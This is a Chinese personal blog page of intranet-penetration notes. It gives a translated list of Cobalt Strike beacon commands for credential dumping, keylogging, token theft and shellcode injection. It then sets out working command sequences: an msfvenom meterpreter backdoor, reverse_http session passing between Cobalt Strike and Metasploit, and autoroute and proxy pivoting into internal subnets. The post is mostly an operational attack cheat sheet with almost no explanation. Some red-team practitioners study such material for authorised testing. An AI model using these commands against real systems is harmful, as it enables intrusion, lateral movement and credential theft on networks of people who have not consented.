<!DOCTYPE html>
<html>
  
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  <meta name="author" content="Dong Yuanxin">
  
  
  <title>cs | hcncn6</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="内网,">
  

  
  <meta name="description" content="hcncn小站">

  

  
    <script src="//cdn.jsdelivr.net/npm/leancloud-storage@3.11.1/dist/av-min.js" async></script>
  

  
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" async></script>
  

  

  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"Hyq9wkH495DgNHWhDQCOfQSp-gzGzoHsz","appkey":"WaR7nrzhliHj9aVwdQzkdlGd","comment":false,"count":true},
    welcome: {"enable":false,"interval":30},
    start_time: "2018-11-1",
    passwords: ["efe07af7441da2b69c4a41e42e73be4db47f66010a56900788a458354a7373ec", ],
    is_post: true,
    lock: false,
    author: "Dong Yuanxin",
    share: {"twitter":false,"facebook":false,"weibo":false,"qq":false,"wechat":false},
    mathjax: true,
    page_type: "",
    root: "/"
  };
</script>

  <script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>

  
    <link rel="icon" href="/images/favicon.ico">
    <link rel="apple-touch-icon" href="/images/touch-icon.png">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  <link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">

  
</head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">博客0v0</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | 博客重建中，还有其他细节文章</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/categories/" target="_self">分类</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/hcncn6" target="_blank" id="site-github">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
      <a href="javascript:void(0);" id="site-nav-btn">
        <i class="fa fa-ellipsis-v"></i>
      </a>
    </div>
  </div>
</header>
<nav class="table-content" id="site-nav">
  <div class="table-content-title">
    <span>导航</span>
  </div>
  <div class="table-content-main">
    <ol class="toc">
      
        <li class="toc-item">
          <a href="/" target="_self">
            首页
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/archives/" target="_self">
            归档
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/categories/" target="_self">
            分类
          </a>
        </li>
      
    </ol>
  </div>
</nav>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2022-09-05
    </span>
    
      <span>
        | <a href="/categories/内网/"><i class="fa fa-bookmark"></i>内网</a>
      </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    cs
  </h1>
  
  <article class="passage-article">
    <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">常用命令汉化</span><br><span class="line"></span><br><span class="line">	argue 匹配进程的欺骗参数</span><br><span class="line">audit_uac 审查关于bypass uac 的方法</span><br><span class="line">blockdlls 在子进程中阻止非Microsoft DLL</span><br><span class="line">browserpivot 设置浏览器透视会话</span><br><span class="line">cancel 取消正在进行的下载</span><br><span class="line">cd 更改目录</span><br><span class="line">checkin 呼叫总部并发布数据</span><br><span class="line">clear 清除信标队列</span><br><span class="line">connect 通过TCP连接到信标对等方</span><br><span class="line">covertvpn 部署隐蔽VPN客户端</span><br><span class="line">cp 复制文件</span><br><span class="line">dcsync 从DC中提取密码哈希</span><br><span class="line">desktop 查看目标的桌面并与之交互</span><br><span class="line">dllinject 将反射DLL注入进程</span><br><span class="line">dllload 使用LoadLibrary（）将DLL加载到进程中</span><br><span class="line">download 下载文件</span><br><span class="line">downloads 列出正在进行的文件下载</span><br><span class="line">drives 列出目标上的驱动器</span><br><span class="line">elevate 在提升的上下文中生成会话</span><br><span class="line">execute 在目标上执行程序（无输出）</span><br><span class="line">execute-assembly 在目标上的内存中执行本地.NET程序</span><br><span class="line">exit 终止信标会话</span><br><span class="line">getprivs 在当前令牌上启用系统权限</span><br><span class="line">getsystem 尝试获取系统</span><br><span class="line">getuid 获取用户ID</span><br><span class="line">hashdump 转储密码哈希</span><br><span class="line">help 帮助菜单</span><br><span class="line">inject 在特定进程中生成会话</span><br><span class="line">jobkill 杀死长时间运行的利用后任务</span><br><span class="line">jobs 列出长期运行的利用后任务</span><br><span class="line">jump 在远程主机上生成会话</span><br><span class="line">kerberos_ccache_use 将kerberos票证从缓存应用到此会话</span><br><span class="line">kerberos_ticket_purge 从此会话中清除kerberos票证</span><br><span class="line">kerberos_ticket_use 将kerberos票证应用于此会话</span><br><span class="line">keylogger 将击键记录器注入进程</span><br><span class="line">kill 终止进程</span><br><span class="line">link 通过命名管道连接到信标对等点</span><br><span class="line">logonpasswords 使用mimikatz转储凭据和哈希</span><br><span class="line">ls 列出文件</span><br><span class="line">make_token 创建令牌以传递凭据</span><br><span class="line">mimikatz 运行mimikatz命令</span><br><span class="line">mkdir 制作目录</span><br><span class="line">mode dns 使用DNS A作为数据通道（仅DNS信标）</span><br><span class="line">mode dns-txt 使用DNS TXT作为数据通道（仅DNS信标</span><br><span class="line">mode dns6 使用DNS AAAA作为数据通道（仅DNS信标）</span><br><span class="line">mv 移动文件</span><br><span class="line">net 网络和主机枚举工具</span><br><span class="line">note 为该信标指定一个注释</span><br><span class="line">portscan 扫描网络中的开放服务</span><br><span class="line">powerpick 通过非托管PowerShell执行命令</span><br><span class="line">powershell 通过powershell.exe执行命令</span><br><span class="line">powershell-import 导入powershell脚本</span><br><span class="line">ppid 为衍生的事后交货作业设置父PID</span><br><span class="line">ps 显示进程列表</span><br><span class="line">psinject 在特定进程中执行PowerShell命令</span><br><span class="line">pth 使用Mimikatz传递散列</span><br><span class="line">pwd 打印当前目录</span><br><span class="line">reg 查询注册表</span><br><span class="line">remote-exec 在远程主机上运行命令</span><br><span class="line">rev2self 还原为原始令牌</span><br><span class="line">rm 删除文件或文件夹</span><br><span class="line">rportfwd 设置反向端口前进</span><br><span class="line">run 在目标上执行程序（返回输出）</span><br><span class="line">runas 以另一个用户的身份执行程序</span><br><span class="line">runasadmin 在提升的上下文中执行程序</span><br><span class="line">runu 在另一个PID下执行程序</span><br><span class="line">screenshot 截图</span><br><span class="line">setenv 设置环境变量</span><br><span class="line">shell 通过cmd.exe执行命令</span><br><span class="line">shinject 将外壳代码注入进程</span><br><span class="line">shspawn 生成进程并将外壳代码注入其中</span><br><span class="line">sleep 设置信标睡眠时间</span><br><span class="line">socks 启动SOCKS4a服务器以中继流量</span><br><span class="line">socks stop 停止SOCKS4a服务器</span><br><span class="line">spawn 生成会话</span><br><span class="line">spawnas 作为另一个用户生成会话</span><br><span class="line">spawnto 将可执行文件设置为将进程生成到</span><br><span class="line">spawnu 在另一进程下生成会话</span><br><span class="line">ssh 使用SSH在主机上生成SSH会话</span><br><span class="line">ssh-key 使用SSH在主机上生成SSH会话</span><br><span class="line">steal_token 从进程中窃取访问令牌</span><br><span class="line">timestomp 将时间戳从一个文件应用到另一个文件</span><br><span class="line">unlink 断开与父信标的连接</span><br><span class="line">upload 上传文件</span><br><span class="line">我用的是4.0版本的cobaltstrike， 命令和3版本的不同</span><br><span class="line">msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=6662 -f elf &gt; szg.elf</span><br><span class="line">生成后门并用上传到192.168.1.100的服务器上</span><br><span class="line">use multi/handler</span><br><span class="line">set payload  linux/x86/meterpreter/bind_tcp   监听</span><br><span class="line">然后利用这个meterpreter添加到第三层的网络路由：</span><br><span class="line">run autoroute -s 192.168.2.0/24</span><br><span class="line">run autoroute -p</span><br><span class="line">use auxiliary/server/socks4a</span><br><span class="line">run</span><br><span class="line">CS联动MSF</span><br><span class="line">	cs&gt;msf</span><br><span class="line">		现在CS这边已经成功上线一台主机，需要将这个会话传入MSF</span><br><span class="line"></span><br><span class="line">		CS这边新建一个监听器 fo</span><br><span class="line">		use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload</span><br><span class="line">set lhost 192.168.109.128</span><br><span class="line">set lport 5566 #需要设置成跟CS一样的端口</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		然后CS这边选择增加会话</span><br><span class="line"></span><br><span class="line">		cs》for 监听&gt;</span><br><span class="line">		然后指定生成的msf监听器即可</span><br><span class="line"></span><br><span class="line">	msf&gt;cs</span><br><span class="line">		MSF联动CS</span><br><span class="line">现在MSF这边已经成功获得一台主机会话，需要将这个会话上线CS</span><br><span class="line">		添加监听</span><br><span class="line">		use exploit/windows/local/payload_inject</span><br><span class="line">set payload windows/meterpreter/reverse_http #需要同CSpayload一致</span><br><span class="line">set lport 4444 #需要同CS监听端口一致</span><br><span class="line">set session 1 #需要传入的session</span><br><span class="line">		lport写的是cs监听端口 lhost写的是cs主机ip</span><br><span class="line"></span><br><span class="line">		exploit</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		cs bea 4444</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf</span><br><span class="line">	添加内网路由</span><br><span class="line">	然后我们现在想要继续渗透内网。</span><br><span class="line">我们先获取目标内网相关信息，可以看到该主机上的网卡有两个网段。</span><br><span class="line">	run get_local_subnets</span><br><span class="line">	如果我们不添加这两个网段路由的话，是探测不到这两个网段其他主机的。</span><br><span class="line">以下是手动添加到达192.168.11.0和192.168.12.0的路由</span><br><span class="line">#在全局给指定的session增删路由</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	route add 192.168.11.0  255.255.255.0  1    </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	 #在session1中添加到达192.168.11.0网段的路由</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	route add 192.168.12.0  255.255.255.0  1  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	   #在session1中添加到达192.168.12.0网段的路由</span><br><span class="line">route add 0.0.0.0       0.0.0.0        1     #在session1中添加到达0.0.0.0/24网段的路由</span><br><span class="line">route del 192.168.12.0  255.255.255.0  2     #在session2中删除到达192.168.12.0网段的路由</span><br><span class="line">route print    #打印路由信息</span><br><span class="line">#也可以在进入session下添加路由</span><br><span class="line">run autoroute -s 192.168.11.0/24             #添加到达192.168.11.0网段的路由</span><br><span class="line">run autoroute -s 192.168.12.0/24             #添加到达192.168.12.0网段的路由</span><br><span class="line">run autoroute -s 0.0.0.0/0                   #添加到达0.0.0.0/0的路由</span><br><span class="line">run autoroute -p                             #打印路由信息</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">cs 多层代理+msf</span><br><span class="line">	msf</span><br><span class="line">	反向代理上线</span><br><span class="line">利用拿到的目标10.10.10.1 作为中转。让10.10.10.2 上线到cs端。</span><br><span class="line">设置监听：</span><br><span class="line">	生成马在10.10.10.2 上线即可，通过10.10.10.1 上线到cs端。</span><br><span class="line">这里选择使用powershell 测试。</span><br><span class="line">	正向代理上线</span><br><span class="line">选择监听--》tcp</span><br><span class="line">	子主题</span><br><span class="line">	tcp 正向</span><br><span class="line">	执行后使用connect 命令连接：</span><br><span class="line">connect 192.168.57.140</span><br></pre></td></tr></table></figure>
  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: hcncn</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">https://hcncn6.github.io/2022/09/05/内网/cs/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
</div>

    </main>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
      <div class="site-footer-info">
        <i class="fa fa-paw"></i> 您是本站第 <span id="site-count"></span> 位访客
      </div>
    
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <div class="site-layer-input-choose">
          <a href="javascript:void(0);" title="Change Search Engine">Google</a>
        </div>
        <input type="text">
        <i class="fa fa-search"></i>
      </div>
      
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
  </div>
</div>
    

<div class="bottom-bar">
  <div class="bottom-bar-left">
    <a href="/2022/09/05/个人/" data-enable="true">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/2022/09/05/web/9 - 副本 - 副本/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
  
  
  
  
</div>
    





    
  </body>
</html>